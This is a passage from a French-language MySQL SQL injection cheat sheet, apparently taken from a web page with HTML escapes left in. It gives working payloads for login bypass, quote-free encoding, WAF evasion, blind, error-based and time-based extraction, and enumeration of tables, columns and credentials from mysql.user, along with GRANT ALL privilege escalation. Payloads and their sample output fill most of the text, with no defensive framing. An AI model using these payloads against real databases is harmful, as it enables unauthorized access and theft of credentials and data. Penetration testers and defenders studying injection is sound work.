\n| information_schema<\/td>\n | Disponible depuis la version 5<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\nTester une injection<\/h2>\nInjection dans une cha\u00eene de caract\u00e8res<\/h3>\nPour la requ\u00eate suivante :<\/strong><\/p>\n[sql]SELECT * FROM Table WHERE data = ‘[INJ]’;[\/sql]<\/p>\n \n\n\n| ‘<\/td>\n | Simple quote x1<\/td>\n | False<\/td>\n<\/tr>\n | \n| ‘ ‘<\/td>\n | Simple quote x2<\/td>\n | True<\/td>\n<\/tr>\n | \n| “<\/td>\n | Double quote x1<\/td>\n | False<\/td>\n<\/tr>\n | \n| “”<\/td>\n | Double quote x2<\/td>\n | True<\/td>\n<\/tr>\n | \n| \\<\/td>\n | Backslash x1<\/td>\n | False<\/td>\n<\/tr>\n | \n| \\\\<\/td>\n | Backslash x2<\/td>\n | True<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n Exemples :<\/strong><\/p>\n[sql]SELECT * FROM Table WHERE data = ‘xxx”’;
\nSELECT * FROM Table WHERE data = ‘1”””””’UNION SELECT ‘2’;[\/sql]<\/p>\n Remarques :<\/strong><\/p>\n\n- Il est possible d’utiliser autant d’apostrophe (quote<\/em>) et de\u00a0guillemet (double-quote<\/em>)\u00a0tant qu’ils vont par paire.<\/li>\n
- Il est possible de continuer la requ\u00eate \u00e0 la suite d’une cha\u00eene de quote.<\/li>\n
- Une quote \u00e9chappe une seconde quote, d’o\u00f9 le cha\u00eenage par paire.<\/li>\n<\/ul>\n
Injection par valeurs num\u00e9riques<\/h3>\nPour la requ\u00eate suivante :<\/strong><\/p>\n[sql]SELECT * FROM Table WHERE data = [INJ];[\/sql]<\/p>\n \n\n\n| AND 1<\/td>\n | True<\/td>\n<\/tr>\n | \n| AND 0<\/td>\n | False<\/td>\n<\/tr>\n | \n| AND true<\/td>\n | True<\/td>\n<\/tr>\n | \n| AND false<\/td>\n | False<\/td>\n<\/tr>\n | \n| 1-false<\/td>\n | Retourne 1 si vuln\u00e9rable<\/td>\n<\/tr>\n | \n| 1-true<\/td>\n | Retourne 0 si vuln\u00e9rable<\/td>\n<\/tr>\n | \n| 1*1337<\/td>\n | Retourne 1337 si vuln\u00e9rable<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n Format num\u00e9riques valides :<\/strong><\/p>\nChacune de ces techniques peut servir d’\u00e9vasion d’expressions r\u00e9guli\u00e8res d’IDS\/WAF.<\/p>\n \n\n\ndigits<\/code><\/td>\n| 1337<\/td>\n<\/tr>\n | \ndigits[.]<\/code><\/td>\n| 1337.<\/td>\n<\/tr>\n | \ndigits[.]digits<\/code><\/td>\n| 13.37<\/td>\n<\/tr>\n | \ndigits[eE]digits<\/code><\/td>\n| 13e37, 13E37<\/td>\n<\/tr>\n | \ndigits[eE][+-]digits<\/code><\/td>\n| 13e-37, 13E+37<\/td>\n<\/tr>\n | \ndigits[.][eE]digits<\/code><\/td>\n| 13.e37<\/td>\n<\/tr>\n | \ndigits[.]digits[eE]digits<\/code><\/td>\n| 13.3E7<\/td>\n<\/tr>\n | \ndigits[.]digits[eE][+-]digits<\/code><\/td>\n| 13.3e-7<\/td>\n<\/tr>\n | \n[.]digits<\/code><\/td>\n| .1337<\/td>\n<\/tr>\n | \n[.]digits[eE]digits<\/code><\/td>\n| .13e37<\/td>\n<\/tr>\n | \n[.]digits[eE][+-]digits<\/code><\/td>\n| .13E-37<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n Expressions math\u00e9matiques \u00e9quivalentes :<\/strong><\/p>\nPour des injections \u00e9quivalentes au\u00a0traditionnel\u00a0“OR 1=1”, les syntaxes suivantes (et d\u00e9riv\u00e9es) peuvent \u00eatre utilis\u00e9es :<\/p>\n [sql]
\nCOS(0)=SIN(PI()\/2)
\nCOS(@@VERSION)=SIN(@@VERSION+PI()\/2)
\n[\/sql]<\/p>\n Exemples :<\/strong><\/p>\n[sql]SELECT * FROM Table WHERE data = 3+1337;[\/sql]<\/p>\n Remarques :<\/strong><\/p>\n\n- Le bool\u00e9en true \u00e9quivaut \u00e0 l’entier 1<\/li>\n
- Le bool\u00e9en false \u00e9quivaut \u00e0 l’entier 0<\/li>\n<\/ul>\n
Injection dans un formulaire de connexion\/login<\/h3>\nPour la requ\u00eate suivante :<\/strong><\/p>\n[sql]SELECT * FROM Users WHERE username = ‘admin’ AND password = ‘[INJ]’;[\/sql]<\/p>\n Injections :<\/strong><\/p>\n[sql]’ OR 1 — –
\n‘ OR ” = ‘
\n‘ OR 1 = 1 — –
\n‘=’
\n‘LIKE’
\n‘=0–+[\/sql]<\/p>\n Exemples :<\/strong><\/p>\n[sql]SELECT * FROM Users WHERE username = ‘admin’ AND password = ” OR ” = ”;[\/sql]<\/p>\n Commenter la fin d’une requ\u00eate<\/h2>\nLes syntaxes suivantes peuvent \u00eatre utilis\u00e9es pour commenter (d\u00e9sactiver) la fin d’une requ\u00eate \u00e0 la suite d’une injection :<\/p>\n \n\n\n| #<\/td>\n | Hash commentaire<\/td>\n<\/tr>\n | \n| \/*<\/td>\n | C-style commentaire<\/td>\n<\/tr>\n | \n| — –<\/td>\n | SQL commentaire<\/td>\n<\/tr>\n | \n| ;%00<\/td>\n | Nullbyte,fin de cha\u00eene<\/td>\n<\/tr>\n | \n| `<\/td>\n | backtick<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n Exemples :<\/strong><\/p>\n[sql]
\nSELECT * FROM Table WHERE username = ” OR 1=1\u00a0— -‘ AND password = ”;
\nSELECT * FROM Table\u00a0WHERE data = ” UNION SELECT 1, 2, 3`’;
\n[\/sql]<\/p>\n Remarques :<\/strong><\/p>\n\n- Le backtick<\/em> ne peut \u00eatre utilis\u00e9 qu’en terminaison d’une requ\u00eate utilis\u00e9e comme un alias.<\/li>\n<\/ul>\n
Test de version MySQL<\/h2>\n\n- VERSION()<\/li>\n
- @@VERSION<\/li>\n
- @@GLOBAL.VERSION<\/li>\n<\/ul>\n
Exemples :<\/strong><\/p>\n[sql]SELECT * FROM Tables WHERE data = ‘1’ AND MID(VERSION(),1,1) = ‘5’; — true if MySQL 5
\nSELECT@@version — shorter than SELECT VERSION()[\/sql]<\/p>\n Remarques :<\/strong><\/p>\n\n- La cha\u00eene de caract\u00e8res correspondante \u00e0 la version retourn\u00e9e peut contenir “-nt-log” dans le cas d’un d\u00e9ploiement du serveur SQL sous un environnement Windows.<\/li>\n
- Ces mots-cl\u00e9s et fonctions ne sont pas sensibles \u00e0 la casse.<\/li>\n<\/ul>\n
Cr\u00e9dentiels de la base de donn\u00e9es<\/h2>\n\n- Table (privil\u00e8ges root requis) : mysql.user<\/li>\n
- Colonnes : user, password<\/li>\n
- Utilisateur courant : user(), current_user(), current_user, system_user(), session_user()<\/li>\n<\/ul>\n
Exemples :<\/strong><\/p>\n[sql]
\nSELECT current_user;
\nSELECT CONCAT_WS(0x3A, user, password) FROM mysql.user WHERE user = ‘root’– (Privileged)[\/sql]<\/p>\n Remarques :<\/strong><\/p>\n\n- Mots-cl\u00e9s et fonctions insensibles \u00e0 la casse.<\/li>\n<\/ul>\n
Gestion des utilisateurs<\/h2>\nChacune de ces requ\u00eates de gestion des utilisateurs n\u00e9cessite des droits.<\/p>\n Cr\u00e9ation d’un nouvel utilisateur<\/h3>\n[sql]CREATE USER login IDENTIFIED BY ‘password’;[\/sql]<\/p>\n Suppression d’un utilisateur<\/h3>\n[sql]DROP USER login;[\/sql]<\/p>\n Escalade de privil\u00e8ge d’un utilisateur<\/h3>\n[sql]GRANT ALL PRIVILEGES ON *.* TO login@\u2019%’;[\/sql]<\/p>\n Noms des bases de donn\u00e9es<\/h2>\n\n- Tables : mysql.db (privil\u00e8ges root requis), information_schema.schemata (MySQL >= 5)<\/li>\n
- Colonnes : db, schema_name<\/li>\n
- Base de donn\u00e9es courante : database(), schema()<\/li>\n<\/ul>\n
Exemples :<\/strong><\/p>\n[sql]<\/p>\n SELECT database();
\nSELECT schema_name FROM information_schema.schemata;
\nSELECT DISTINCT(db) FROM mysql.db;– (Privileged)[\/sql]<\/p>\n Remarques :<\/strong><\/p>\n\n- Fonctions non sensibles \u00e0 la casse.<\/li>\n<\/ul>\n
Nom d’h\u00f4te du serveur<\/h2>\n\n- @@HOSTNAME<\/li>\n<\/ul>\n
Exemples :<\/strong><\/p>\n[sql]SELECT @@hostname;[\/sql]<\/p>\n Remarques :<\/strong><\/p>\n\n- Mot-cl\u00e9 insensible \u00e0 la casse.<\/li>\n<\/ul>\n
Serveur UID et adresse MAC<\/h2>\nL’UUID (Universally Unique Identifier<\/em>) est un nombre sur 128 bits form\u00e9 \u00e0 partir de l’adresse MAC de l’interface en \u00e9coute.<\/p>\n\n- UUID()<\/li>\n<\/ul>\n
Exemples :<\/strong><\/p>\n[bash]aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee;[\/bash]<\/p>\n Remarques :<\/strong><\/p>\n\n- Les 12 derni\u00e8res caract\u00e8res repr\u00e9sent\u00e9 par la lettre “e” correspondent \u00e0 l’adresse MAC.<\/li>\n
- Certains OS retournent 48 bits al\u00e9atoires \u00e0 la place de l’adresse MAC, ce n’est pas le cas de Windows.<\/li>\n
- Fonction insensible \u00e0 la casse.<\/li>\n<\/ul>\n
Tables et colonnes<\/h2>\nD\u00e9terminer le nombre de colonnes<\/h3>\nVia “order by”<\/h4>\n\n- ORDER BY N+1;<\/li>\n<\/ul>\n
Remarques :<\/strong><\/p>\n\n- Continuer d’incr\u00e9menter la valeur de N jusqu’\u00e0 ce que la r\u00e9ponse soit false (une erreur).<\/li>\n<\/ul>\n
Exemples :<\/strong><\/p>\nPour la requ\u00eate suivante :<\/p>\n [sql]SELECT * FROM Table WHERE data = ‘[INJ]’;[\/sql]<\/p>\n \n\n\n| 1′ ORDER BY 1–+<\/td>\n | True<\/td>\n<\/tr>\n | \n| 1′ ORDER BY 2–+<\/td>\n | True<\/td>\n<\/tr>\n | \n| 1′ ORDER BY 3–+<\/td>\n | True<\/td>\n<\/tr>\n | \n| 1′ ORDER BY 4–+<\/td>\n | False – La requ\u00eate ne dispose que de 3 colonnes<\/td>\n<\/tr>\n | \n| -1′ UNION SELECT 1,2,3–+<\/td>\n | True<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\nVia les erreurs<\/h4>\n[sql]AND (SELECT * FROM SOME_EXISTING_TABLE) = 1[\/sql]<\/p>\n Remarques :<\/strong><\/p>\n\n- Cette syntaxe fonctionne si l’on connait le nom de la table dont on cherche le nombre de colonnes ; et si l’affichage des erreurs est activ\u00e9.<\/li>\n
- La requ\u00eate retournera une erreur indiquant le nombre de colonnes dans la table, et non pas la requ\u00eate en elle-m\u00eame.<\/li>\n<\/ul>\n
Exemple :<\/strong><\/p>\n[sql]SELECT * FROM Tables WHERE data = [INJ][\/sql]<\/p>\n Avec l’injection :<\/p>\n [sql]AND (SELECT * FROM Unknown_Table) = 1[\/sql]<\/p>\n Erreur retourn\u00e9e :<\/p>\n Operand should contain 3 column(s)<\/p><\/blockquote>\n R\u00e9cup\u00e9rer le nom des tables<\/h3>\nVia “Union”<\/h4>\n[sql]UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10;[\/sql]<\/p>\n Remarques :<\/strong><\/p>\n\n- Version=9 pour MySQL v4<\/li>\n
- Version=10 pour MySQL v5<\/li>\n<\/ul>\n
En mode aveugle “Blind”<\/h4>\n[sql]AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables &gt; ‘A’;
\nAND 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA=&quot;myDB&quot; AND table_name REGEXP ‘^[a-z]’ LIMIT 0,1)
\n[\/sql]<\/p>\n Remarques :<\/strong><\/p>\n\n- Appliquer un algorithme dichotomique sur la premi\u00e8re requ\u00eate pour optimiser le temps de recherche et le trafic r\u00e9seau (O(log n)).<\/li>\n
- Privil\u00e9gier la seconde pour r\u00e9duire encore le nombre de requ\u00eate.<\/li>\n<\/ul>\n
Via les erreurs<\/h4>\n[sql]AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT(SELECT(SELECT DISTINCT CONCAT(0x7e,0x27,CAST(table_name as char),0x27,0x7e) FROM information_schema.tables WHERE table_schema='[DB_NAME]’ LIMIT N,1)) FROM information_schema.tables LIMIT 0,1),FLOOR(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)[\/sql]<\/p>\n Remarques :<\/strong><\/p>\n\n- Indiquer le nom de la base de donn\u00e9es dont les noms des tables sont \u00e0 extraire.<\/li>\n
- Faire \u00e9voluer la valeur de N de 0 \u00e0 X pour r\u00e9cup\u00e9rer le nom de chaque table dans les erreurs.<\/li>\n<\/ul>\n
R\u00e9sultats :<\/strong><\/p>\n#1062 – Duplicate entry ‘~’myTable’~1’ for key ‘group_key’<\/p><\/blockquote>\n [sql]AND ExtractValue(1, CONCAT(0x5c, (SELECT table_name FROM information_schema.tables LIMIT N,1)));– Available in 5.1.5[\/sql]<\/p>\n R\u00e9sultats :<\/strong><\/p>\n#1105 – XPATH syntax error: ‘\\myTable’<\/p><\/blockquote>\n Remarques :<\/strong><\/p>\n\n- Cette seconde m\u00e9thode, pr\u00e9sente depuis MySQL 5.1.5, ne n\u00e9cessite pas de nom de base.<\/li>\n
- Faire \u00e9voluer la valeur de N de 0 \u00e0 X pour r\u00e9cup\u00e9rer le nom de chaque table dans les erreurs.<\/li>\n<\/ul>\n
R\u00e9cup\u00e9rer le nom des colonnes<\/h3>\nVia “Union”<\/h4>\n[sql]UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = ‘tablename'[\/sql]<\/p>\n En mode aveugle “Blind”<\/h4>\n[sql]AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns &gt; ‘A'[\/sql]<\/p>\n Remarques :<\/strong><\/p>\n\n- Appliquer un algorithme dichotomique pour optimiser les requ\u00eates, le temps de recherche et le trafic r\u00e9seau (O(log n)).<\/li>\n<\/ul>\n
Via les erreurs<\/h4>\n[sql]AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT(SELECT(SELECT DISTINCT CONCAT(CAST(column_name as char)) FROM information_schema.columns WHERE table_schema='[DB NAME]’ AND table_name='[TABLE_NAME]’ LIMIT N,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)[\/sql]<\/p>\n Remarques :<\/strong><\/p>\n\n- Indiquer le nom de la base de donn\u00e9es cible, ainsi que le nom de la table dans laquelle extraire les colonnes.<\/li>\n
- Faire \u00e9voluer la valeur de N de 0 \u00e0 X pour r\u00e9cup\u00e9rer le nom de chaque colonne dans les erreurs.<\/li>\n<\/ul>\n
R\u00e9sultats :<\/strong><\/p>\n#1062 – Duplicate entry ‘myColumn’ for key ‘group_key’<\/p><\/blockquote>\n [sql]AND ExtractValue(1, CONCAT(0x5c, (SELECT column_name FROM information_schema.columns LIMIT N,1)));– Available in MySQL 5.1.5[\/sql]<\/p>\n Remarques :<\/strong><\/p>\n\n- Cette seconde m\u00e9thode, pr\u00e9sente depuis MySQL 5.1.5, ne n\u00e9cessite pas de nom de base ni de nom de table.<\/li>\n
- Faire \u00e9voluer la valeur de N de 0 \u00e0 X pour r\u00e9cup\u00e9rer le nom de chaque colonne dans les erreurs.<\/li>\n<\/ul>\n
R\u00e9sultats :<\/strong><\/p>\n#1105 – XPATH syntax error: ‘\\myColumn’<\/p><\/blockquote>\n Via la proc\u00e9dure “ANALYSE()”<\/h4>\n\n- PROCEDURE ANALYSE()<\/li>\n<\/ul>\n
Remarques :<\/strong><\/p>\n\n- Il est n\u00e9cessaire que l’application (web) vuln\u00e9rable \u00e0 l’injection SQL affiche la premi\u00e8re colonne r\u00e9sultante de la requ\u00eate.<\/li>\n<\/ul>\n
Exemples :<\/strong><\/p>\nPour la requ\u00eate suivante :<\/p>\n [sql]SELECT * FROM Table WHERE data=[INJ][\/sql]<\/p>\n \n\n\n| 1 PROCEDURE ANALYSE()<\/td>\n | R\u00e9cup\u00e8re le nom de la premi\u00e8re colonne de la table<\/td>\n<\/tr>\n | \n| 1 LIMIT 1,1 PROCEDURE ANALYSE()<\/td>\n | R\u00e9cup\u00e8re le nom de la seconde colonne<\/td>\n<\/tr>\n | \n| 1 LIMIT 2,1 PROCEDURE ANALYSE()<\/td>\n | R\u00e9cup\u00e8re le nom de la troisi\u00e8me colonne…<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\nR\u00e9cup\u00e9rer plusieurs tables\/colonnes en une fois<\/h3>\nTechnique n\u00b01<\/h4>\n[sql]SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema&gt;=@) AND (@)IN (@:=CONCAT(@,0x0a,’ [ ‘,table_schema,’ ] &gt;’,table_name,’ &gt; ‘,column_name))))x[\/sql]<\/p>\n Exemples :<\/strong><\/p>\n[sql]SELECT * FROM Table WHERE data = ‘-1′ UNION SELECT 1, 2, (SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema&gt;=@) AND (@)IN (@:=CONCAT(@,0x0a,’ [ ‘,table_schema,’ ] &gt;’,table_name,’ &gt; ‘,column_name))))x), 4–+’;[\/sql]<\/p>\n R\u00e9sultats :<\/strong><\/p>\n[bash]
\n[ information_schema ] &gt;CHARACTER_SETS &gt; CHARACTER_SET_NAME
\n[ information_schema ] &gt;CHARACTER_SETS &gt; DEFAULT_COLLATE_NAME
\n[ information_schema ] &gt;CHARACTER_SETS &gt; DESCRIPTION
\n[ information_schema ] &gt;CHARACTER_SETS &gt; MAXLEN
\n[ information_schema ] &gt;COLLATIONS &gt; COLLATION_NAME
\n[ information_schema ] &gt;COLLATIONS &gt; CHARACTER_SET_NAME
\n[ information_schema ] &gt;COLLATIONS &gt; ID
\n[ information_schema ] &gt;COLLATIONS &gt; IS_DEFAULT
\n[ information_schema ] &gt;COLLATIONS &gt; IS_COMPILED
\n[\/bash]<\/p>\n Remarques :<\/strong><\/p>\n\n- Le r\u00e9sultat est sous la forme d’un fichier BLOB s’il est cons\u00e9quent.<\/li>\n<\/ul>\n
Technique n\u00b02<\/h4>\n[sql]SELECT MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20, table_name, 0x3c62723e, 0x436f6c756d6e3a20, column_name ORDER BY (SELECT version FROM information_schema.tables) SEPARATOR 0x3c62723e),1,1024) FROM information_schema.columns[\/sql]<\/p>\n Exemples :<\/strong><\/p>\n[sql]SELECT column FROM Table WHERE data = ‘-1′ UNION SELECT MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20, table_name, 0x3c62723e, 0x436f6c756d6e3a20, column_name ORDER BY (SELECT version FROM information_schema.tables) SEPARATOR 0x3c62723e),1,1024) FROM information_schema.columns–+’;[\/sql]<\/p>\n R\u00e9sultats :<\/p>\n [sql]
\nTable: myTable1
\nColumn: login<\/p>\n Table: myTable1
\nColumn: userid<\/p>\n Table: myTable1
\nColumn: password<\/p>\n Table: myTable2
\nColumn: data
\n[\/sql]<\/p>\n Remarques :<\/strong><\/p>\n\n- Le formatage de sortie est en HTML, avec des retours \u00e0 la ligne pour un meilleur affichage.<\/li>\n<\/ul>\n
Trouver des tables \u00e0 partir d’une colonne<\/h3>\n[sql]SELECT table_name FROM information_schema.columns WHERE column_name = ‘myColumn’;
\nSELECT table_name FROM information_schema.columns WHERE column_name LIKE ‘%Col%’;[\/sql]<\/p>\n Trouver des colonnes \u00e0 partir d’une table<\/h3>\n[sql]SELECT column_name FROM information_schema.columns WHERE table_name = ‘myTable’;
\nSELECT column_name FROM information_schema.columns WHERE table_name LIKE ‘%Tab%’;[\/sql]<\/p>\n R\u00e9cup\u00e8re les requ\u00eates courantes<\/h2>\n[sql]SELECT info FROM information_schema.processlist[\/sql]<\/p>\n Remarques :<\/strong><\/p>\n\n- Disponible depuis MySQL 5.1.7<\/li>\n<\/ul>\n
\u00c9viter l’utilisation des quotes<\/h2>\nEncodage en hexad\u00e9cimal<\/h3>\n[sql]SELECT * FROM Users WHERE username = 0x61646D696E;
\nSELECT * FROM Users WHERE username = x’61646D696E’; — use quotes
\n[\/sql]<\/p>\n Remarques :<\/strong><\/p>\n\n- Le pr\u00e9fixe “0x” d’une cha\u00eene encod\u00e9e en hexad\u00e9cimal est sensible \u00e0 la casse ; alors que le pr\u00e9fixe “x'” ne l’est pas.<\/li>\n
- Une cha\u00eene vierge en notation hexad\u00e9cimale ne peut se noter 0x, mais x”.<\/li>\n
- Attention, “SELECT 0x6164” est une cha\u00eene de caract\u00e8res, mais “SELECT 0x61+0x64” est un entier.<\/li>\n<\/ul>\n
Fonction CHAR()<\/h3>\n[sql]SELECT * FROM Users WHERE username = CHAR(97, 100, 109, 105, 110)[\/sql]<\/p>\n Encodage en binaire<\/h3>\n[sql]
\nSELECT * FROM Users WHERE username = 0b0110000101100100011011010110100101101110;
\nSELECT * FROM Users WHERE username = b’0110000101100100011011010110100101101110′; — use quotes[\/sql]<\/p>\n Remarques :<\/strong><\/p>\n\n- Le pr\u00e9fixe “0b” d’une cha\u00eene encod\u00e9e en binaire est sensible \u00e0 la casse ; alors que le pr\u00e9fixe “b'” ne l’est pas.<\/li>\n
- Une cha\u00eene vierge en notation binaire ne peut se noter 0b, mais b”.<\/li>\n<\/ul>\n
Concat\u00e9nation de cha\u00eene de caract\u00e8res<\/h2>\n[sql]<\/p>\n SELECT ‘a’ ‘d’ ‘mi’ ‘n’;
\nSELECT ‘ad’ &quot;min&quot;;
\nSELECT ‘a’ ‘d’ ‘mi’ ‘n’;
\nSELECT CONCAT(‘a’, ‘d’, ‘m’, ‘i’, ‘n’);
\nSELECT CONCAT_WS(”, ‘a’, ‘d’, ‘m’, ‘i’, ‘n’);
\nSELECT GROUP_CONCAT(‘a’, ‘d’, ‘m’, ‘i’, ‘n’);<\/p>\n [\/sql]<\/p>\n Remarques :<\/strong><\/p>\n\n- CONCAT() retourne NULL si au moins un de ses arguments est NULL. Pr\u00e9f\u00e9rer CONCAT_WS() (with separator<\/em>).<\/li>\n
- Le premier argument de CONCAT_WS() d\u00e9fini le s\u00e9parateur pour le reste des arguments.<\/li>\n<\/ul>\n
Les requ\u00eates conditionnelles<\/h2>\n\n- CASE<\/li>\n
- IF()<\/li>\n
- IFNULL()<\/li>\n
- NULLIF()<\/li>\n<\/ul>\n
Exemples :<\/strong><\/p>\n[sql]
\nSELECT IF(1=1, true, false);
\nSELECT CASE WHEN 1=1 THEN true ELSE false END;[\/sql]<\/p>\n Gestion du temps<\/h2>\n\n- SLEEP() (MySQL v5.0.12)<\/li>\n
- BENCHMARK() (MySQL v4 et v5)<\/li>\n<\/ul>\n
Exemples :<\/strong><\/p>\n[sql]’ – (IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1(‘true’)), false)) – ‘[\/sql]<\/p>\n Remarques :<\/strong><\/p>\n |
| | | | | | | | | | | | | | | | |